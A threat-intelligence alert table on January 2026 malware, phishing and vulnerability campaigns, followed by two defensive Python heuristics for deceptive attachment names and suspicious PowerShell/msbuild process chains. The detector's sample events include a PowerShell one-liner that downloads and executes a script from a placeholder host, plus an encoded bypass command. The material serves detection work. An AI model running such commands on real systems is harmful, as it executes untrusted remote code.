DATE | NAME | INFO | CATEGORY | SUBCATEGORY

17.1.26 | Sicarii Ransomware | Sicarii is a new Ransomware-as-a-Service (RaaS) operation first observed last year. The deployed ransomware is capable of file encryption, data exfiltration, credential harvesting, and network reconnaissance. In the initial stages of an attack it specifically targets vulnerabilities in Fortinet devices; it then encrypts victim files with AES-GCM and appends the .sicarii extension. As reported by researchers from Check Point, a defining characteristic of the malware is a geo-fencing check that prevents execution on systems located in Israel. | ALERTS | RANSOM
17.1.26 | LotusLite backdoor delivery campaign | The Acronis Threat Research Unit has detected a targeted malware campaign aimed at U.S. government entities. The campaign uses politically themed malspam with .ZIP attachments to deliver a custom C++ backdoor dubbed LotusLite. The backdoor is designed for espionage: it communicates with a hard-coded IP-based command-and-control (C2) server and supports remote command execution, data collection and exfiltration, and persistence on the infected system. | ALERTS | CAMPAIGN
17.1.26 | Multi-stage ShadowReactor Campaign Delivers Remcos through Text-based Components | Remcos is a frequently seen Remote Access Trojan (RAT) payload. Researchers at Securonix shared details of a recently observed campaign, tracked as Shadow#Reactor. In this multi-stage campaign, text-based components (VBS files, PowerShell scripts, and encoded text) deliver the final Remcos payload. The chain involves several downloads of attacker-hosted content and uses a LOLBin (msbuild.exe) so that the malicious activity blends in with legitimate tooling. | ALERTS | CAMPAIGN
17.1.26 | deVixor Android malware | deVixor is a new Android banking malware variant observed targeting Iranian users in recent campaigns. As reported by researchers from Cyble, the attackers distribute malicious APK files via phishing websites that mimic legitimate automotive businesses. | ALERTS | VIRUS
17.1.26 | VVS Discord Stealer | VVS Stealer is a Python-based infostealer used to target Discord users and exfiltrate sensitive information. As reported by researchers from Palo Alto Networks Unit 42, once deployed the stealer searches Discord's LevelDB directory for encrypted Discord tokens and harvests extensive account data, including credentials, billing information, and multifactor authentication (MFA) status. | ALERTS | VIRUS
17.1.26 | IT3 Tax-Themed HTML Phishing Targets South African Enterprise Users | A phishing campaign targeting South African organizations abuses SARS IT3 tax certificates as a social-engineering lure. The email uses a subject styled like an internal reference string and delivers a malicious HTML attachment masquerading as a spreadsheet/tax document (e.g., Discovery TAX IT3(B)(C) _ <victim email address> xslx.htm). | ALERTS | PHISHING
17.1.26 | GalleryEye Spyware Masquerades as “Free Saudi Numbers” App | We identified an Android campaign targeting Saudi mobile users with a trojanized application posing as a “Free Saudi Numbers” utility; the underlying threat is the GalleryEye spyware, hosted on MediaFire. The lure is designed to attract users looking for “أرقام سعودية مجاناً” (free Saudi numbers), a highly effective theme because it aligns with common needs such as account verification, messaging registration, and “virtual number” services. | ALERTS | VIRUS
17.1.26 | CVE-2025-14847 - MongoBleed vulnerability exploited in the wild | CVE-2025-14847 is a recently disclosed high-severity (CVSS score 8.7) Improper Handling of Length Parameter Inconsistency vulnerability affecting MongoDB Server in versions from 3.6 onward. | ALERTS | VULNERABILITY
17.1.26 | Multi-Stage AsyncRAT Campaign Abuses Dropbox and Cloudflare | A recent AsyncRAT malware campaign abuses Dropbox and Cloudflare to deliver its payload. Initiated by phishing emails carrying Dropbox links, the multi-stage attack continues by disguising malicious downloads with double file extensions. | ALERTS | CAMPAIGN
17.1.26 | RustyWater Campaigns in the Middle East | CloudSEK recently reported a MuddyWater spear-phishing wave against Middle East targets (diplomatic, maritime, finance, telecom) in which spoofed lures and malicious Word documents drop a newer Rust-based implant the researchers call “RustyWater.” | ALERTS | PHISHING
17.1.26 | That performance report might give you Guloader | A recent report by researchers at AhnLab highlights a Guloader campaign disguised as an employee performance review. Once the malspam's social engineering succeeds, the attached RAR archive is opened and its embedded Guloader executable is launched to begin the attack chain. | ALERTS | VIRUS
17.1.26 | Astaroth banking malware leverages WhatsApp Web for distribution | The Acronis Threat Research Unit has identified a new campaign of the Brazilian banking malware Astaroth, dubbed "Boto Cor-de-Rosa." This iteration marks a significant evolution in the malware's capabilities, specifically in its distribution method: Astaroth now includes a Python-based worm module that abuses WhatsApp Web to spread the infection. | ALERTS | VIRUS
9.1.26 | Recent Linux-based activities of the UAT-7290 threat group | Cisco Talos has identified a new campaign attributed to a threat actor tracked as UAT-7290. The group primarily targets critical infrastructure and telecommunications providers in South Asia, though recent activity indicates a possible expansion into Southeastern Europe. | ALERTS | GROUP
9.1.26 | PHALT#BLYX malicious campaign | A new malware distribution campaign, tracked as PHALT#BLYX, is targeting European hospitality firms with phishing emails that impersonate Booking.com reservation cancellation requests. As reported by Securonix, the operation employs the "ClickFix" social engineering tactic: victims who click the email link are shown a fake Windows Blue Screen of Death (BSOD) and are tricked into opening the Windows Run prompt and pasting a malicious PowerShell command to "resolve" the error. | ALERTS | CAMPAIGN
9.1.26 | CVE-2025-52691 - SmarterTools SmarterMail vulnerability | CVE-2025-52691 is a recently disclosed critical (CVSS score 10.0) arbitrary file upload vulnerability affecting SmarterTools SmarterMail, an email, groupware, and collaboration server positioned as an alternative to enterprise collaboration solutions such as Microsoft Exchange. | ALERTS | VULNERABILITY
9.1.26 | Kimwolf Android botnet | The Kimwolf botnet has reportedly infected more than 2 million Android devices, reaching them through residential proxy networks. According to researchers from XLab, the malware is a strain of the AISURU botnet family and has been active since at least August 2025. Its capabilities include various DDoS attacks, proxy forwarding, reverse shell, and file management, among others. | ALERTS | BOTNET
4.1.26 | Datebug APT campaign targeting governmental organizations in India | Researchers from Cyfirma have identified a targeted cyber espionage campaign attributed to the Datebug APT group (aka APT36, Transparent Tribe). The campaign uses a deceptive delivery mechanism: weaponized Windows shortcut (LNK) files concealed within a ZIP archive and masquerading as a legitimate PDF. The infection chain is notable for its stealthy, fileless execution. | ALERTS | APT
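The attachment tricks in two of the entries above, the IT3 tax phishing (an .htm file named to look like a spreadsheet) and the AsyncRAT campaign (double file extensions), can both be caught at the mail gateway with a filename heuristic. The following is an added example written for this page, not code from any of the vendors cited in the table; the extension lists, the lure-word pattern, the function names and the sample filenames are the editor's own assumptions and constructed inputs.

```python
"""Heuristic check for deceptive attachment names (added example, not vendor code)."""
from __future__ import annotations
import re

# Extensions that execute or render active content when a user double-clicks them on Windows
ACTIVE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe", "js", "jse", "wsf",
               "wsh", "ps1", "hta", "lnk", "msi", "htm", "html", "shtml"}
# Extensions a recipient expects for an ordinary document
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf", "csv"}
# Document-lure words, including the misspelt "xslx" seen in the IT3 lure (assumed list)
DOC_WORDS = re.compile(r"\b(pdf|docx?|xslx|xlsx?|invoice|statement|tax|certificate|it3)\b", re.I)


def suspicious_attachment(name: str) -> list[str]:
    """Return the reasons an attachment name looks deceptive; an empty list means nothing flagged."""
    reasons: list[str] = []
    base = name.replace("\\", "/").rsplit("/", 1)[-1].strip().lower()
    parts = [p for p in base.split(".") if p]
    if len(parts) < 2:
        return reasons
    final = parts[-1]
    # strip() defeats the "report.pdf      .exe" padding trick
    inner = [p.strip() for p in parts[:-1]]
    if final in ACTIVE_EXTS:
        # "report.pdf.exe" / "scan.docx.js": a document extension hidden before an active one
        if any(p in DOC_EXTS for p in inner):
            reasons.append(f"double extension: document-looking '.{inner[-1]}' before active '.{final}'")
        # "... TAX IT3(B)(C) ... xslx.htm": an HTML attachment dressed up as a tax document
        if final in {"htm", "html", "shtml"} and DOC_WORDS.search(" ".join(inner)):
            reasons.append(f"HTML attachment with document lure in name: '{base}'")
    return reasons


# Constructed sample names, not filenames taken from any real campaign
SAMPLE_NAMES = [
    "Q4_forecast.xlsx",
    "index.html",
    "Invoice_2026.pdf.exe",
    "scan.docx   .js",
    "Discovery TAX IT3(B)(C) _ victim@example.com xslx.htm",
]


def scan(names: list[str]) -> dict[str, list[str]]:
    """Map each flagged name to its reasons; clean names are omitted."""
    return {n: r for n in names if (r := suspicious_attachment(n))}


if __name__ == "__main__":
    for flagged, why in scan(SAMPLE_NAMES).items():
        print(flagged, "->", why)
```

The check is deliberately conservative: a bare `.htm` attachment is not flagged on its own, only when its name also carries a document lure, which keeps legitimate HTML newsletters out of the quarantine.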
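The Shadow#Reactor chain (script hosts handing off to PowerShell and then to msbuild.exe) and the PHALT#BLYX ClickFix lure (a PowerShell command pasted into the Run prompt, so explorer.exe is PowerShell's parent) both leave a distinctive parent/child process signature in endpoint telemetry. The following is an added example, not code from Securonix or any other vendor cited in the table: it classifies Sysmon-style process-creation records, and the record fields, the flag/cmdlet pattern, the rule names and the sample events are the editor's own assumptions and constructed inputs.

```python
"""Process-creation heuristics for ClickFix and script-to-LOLBin chains (added example, not vendor code)."""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent process image path (Sysmon ParentImage, assumed field mapping)
    image: str    # child process image path (Sysmon Image)
    cmdline: str  # child command line (Sysmon CommandLine)


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell flags and cmdlets typical of pasted or script-generated download stagers (assumed list)
STAGER_PATTERN = re.compile(
    r"(-e(c|nc[a-z]*)?\s|-w(indowstyle)?\s+hidden|\biwr\b|\birm\b|invoke-webrequest|"
    r"invoke-restmethod|downloadstring|downloadfile|frombase64string|https?://)", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the rule names an event matches; an empty list means benign under these rules."""
    parent, image = basename(ev.parent), basename(ev.image)
    hits: list[str] = []
    staged = bool(STAGER_PATTERN.search(ev.cmdline))
    # ClickFix: the victim pastes the command into Win+R, so explorer.exe is PowerShell's parent
    if parent == "explorer.exe" and image in POWERSHELL and staged:
        hits.append("clickfix: powershell launched from explorer.exe with stager flags")
    # Text-based chain: a script host launches PowerShell with encoded or download arguments
    if parent in {"wscript.exe", "cscript.exe", "mshta.exe"} and image in POWERSHELL and staged:
        hits.append(f"script-chain: {parent} launched powershell with stager flags")
    # LOLBin: msbuild.exe compiling a project file handed to it by a script host
    if image == "msbuild.exe" and parent in SCRIPT_HOSTS:
        hits.append(f"lolbin: msbuild.exe spawned by {parent}")
    return hits


def detect(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map the index of each matching event to its rule hits."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


# Constructed sample events; paths and the 203.0.113.5 address are documentation placeholders
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iwr http://203.0.113.5/fix.ps1 | iex"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\Public\build.xml"),
    ProcEvent(r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj"),
]


if __name__ == "__main__":
    for idx, hits in detect(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].cmdline, "->", hits)
```

The parent-process condition does the real work: an analyst opening PowerShell from the Start menu also has explorer.exe as parent, which is why the ClickFix rule additionally requires a hidden window or a download primitive on the command line, and why msbuild.exe launched by Visual Studio is left alone.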